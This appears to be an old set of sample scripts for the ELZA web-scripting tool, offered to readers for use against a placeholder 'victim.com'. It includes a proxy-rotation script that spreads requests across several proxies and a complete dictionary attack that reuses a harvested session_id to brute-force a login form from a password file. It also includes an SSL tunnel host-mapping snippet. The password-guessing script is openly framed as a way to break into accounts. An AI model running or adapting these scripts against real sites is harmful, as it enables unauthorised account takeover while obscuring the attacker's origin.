Those are some samples of code that one may find useful:

1. PROXY ROTATION

	# First, push values into PROXY and PORT. Each time we use one of
	# those substs, the next available value is substituted.

	subst PROXY @ proxy.domain1.com proxy.domain2.com proxy.domain3.com
	subst PORT @ 3128 8080 80

	# the BEFOREREQUEST proc is automatically executed before making
	# a request to remote server. This allows us to set a proxy server.
	
	proc BEFOREREQUEST

		# Push the next avaiable values from PROXY and PORT into
		# the respective system variable
		var proxy = PROXY
		var port = PORT

	endproc BEFOREREQUEST

	# And now we do the requests we want to do. Each of them is piped
	# through a different proxy server.

	get url http://www.victim.com/page1.html
	get url http://www.victim.com/page2.html
	get url http://www.victim.com/page3.html
	get url http://www.victim.com/page4.html
	get url http://www.victim.com/page5.html

In this example, page1.html is requested through proxy.domain1.com on port
3128, page2.html is requested through proxy.domain2.com:8080, and page3.html
- through proxy.domain3.com:80. page4.html is requested again through the
first proxy, page5.html - through the second and so on. Cool, isn't it?

2. DICTIONARY ATTACK

This script is to serve as an example on how one can write a dictionary
attacks work using the ELZA. I guess many web site administrators are not
THAT stupid after all. If they lock out an account after several wrong
passwords, you can do nothing.

	# First, we define the static things

	subst ACCOUNT = bozo

	# We request the actual login form so that we can examine it
	
	get url http://www.victim.com/loginform.html

	# Then, we grab the very important session_id hidden form field,
	# so that we pass it along with each of our login attempts.

	field session_id $

	# Then, we save the form field value we just grabbed into a subst
	# so that we can use it in the future.

	subst SID f= session_id
	
	# Next, we define a procedure to be executed if our attack is
	# successful.

	proc SUCCESS

		print WOW! Login: ACCOUNT, Password: CURRPASS

	endproc SUCCESS

	# Then, we define the procedure that tries to break in

	proc TRYPASSWORD
	
		# All necessary fields should be set before the request,
		# because they are cleared after each request.

		field username = ACCOUNT
		field password = CURRPASS

		# We set the session_id form field value we hijacked from the
		# legitimate login form.

		field session_id = SID

		# And we do a POST to the login script

		post url http://www.victim.com/cgi-bin/login.cgi

		# Next, we check if we were successful and if we are,
		# we call the SUCCESS procedure.

		call SUCCESS if body != Login failed!

	endproc TRYPASSWORD

	# And finally, we define the main loop that is to execute the
	# TRYPASSWORD for each password from our dictionary file (dict.txt)

	call TRYPASSWORD CURRPASS % dict.txt

3. AVOIDING SPAWINING THE SSL TUNNEL REPEATEDLY

This should work as follows:

	1. Spawn the tunnel before running the ELZA Script.

	2. In the elza script, do a hostmap for the host you want to
	connect to:

		# Tell ELZA not to spawn tunnel when encountering https://

		var honorhttps = no
	
		# Tell ELZA to pipe all request to secure-server.victim.com
		# on port 443 to localhost, port 24242

		hostmap secure-server.victim.com 443 localhost 24242

That is all for now. If you have a piece of code you would like to be
included, please pass it on to philip_stoev@iname.com.